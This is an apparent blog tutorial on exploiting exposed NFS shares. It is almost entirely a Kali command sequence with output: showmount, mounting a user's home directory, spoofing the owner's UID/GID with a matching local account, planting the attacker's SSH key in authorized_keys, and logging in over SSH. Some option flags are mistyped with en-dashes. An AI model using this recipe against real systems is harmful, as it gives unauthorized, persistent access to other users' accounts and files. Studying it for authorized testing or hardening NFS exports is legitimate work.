How To Find NFS Mounted Drives (Penetration Testing)

How to find nfs hidden drives when doing penetration testing on a target box?

The idea here is to find out the mounted drives on the target box and exploit it, after we get the information about the target directory name we can view it’s UID,GID information to make the same user with the same ID on our machine and mount the hoe directory of the target machine on ours.

once we done that we can copy our SSH keys to the mounted directory and login with our credentials.

You can use the following commands:

showmount -e 192.168.1.4
Export list for 192.168.1.4:
/home/frank *

root@kali:~# mkdir frank
root@kali:~# mount -t nfs 192.168.1.4:/home/frank ~/frank

root@kali:~# ls frank
ls: cannot open directory frank’: Permission denied

root@kali:~# ls -ld frank
drwxr-x— 4 nobody 4294967294 4096 Apr 5 15:16 frank
root@kali:~# stat frank
File: ‘frank’
Size: 4096 Blocks: 8 IO Block: 32768 directory
Device: 30h/48d Inode: 32917 Links: 4
Access: (0750/drwxr-x—) Uid: (65534/ nobody) Gid: (4294967294/ UNKNOWN)

root@kali:~# mount -t nfs -o vers=3 192.168.1.4:/home/frank ~/frank
root@kali:~# ls -ld frank
drwxr-x— 4 2008 2008 4096 Apr 5 15:16 frank

root@kali:~# groupadd –gid 2008 frank_group
root@kali:~# useradd –uid 2008 –groups frank_group frank

At This Point We Are Done Adding a New User To Our Machine, Now We Can Copy Our SSH Keys and Login To It:

root@kali:~# mkdir frank/.ssh
root@kali:~# cp ~/.ssh/id_rsa.pub frank/.ssh/authorized_keys

root@kali:~# ssh frank@192.168.1.4

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s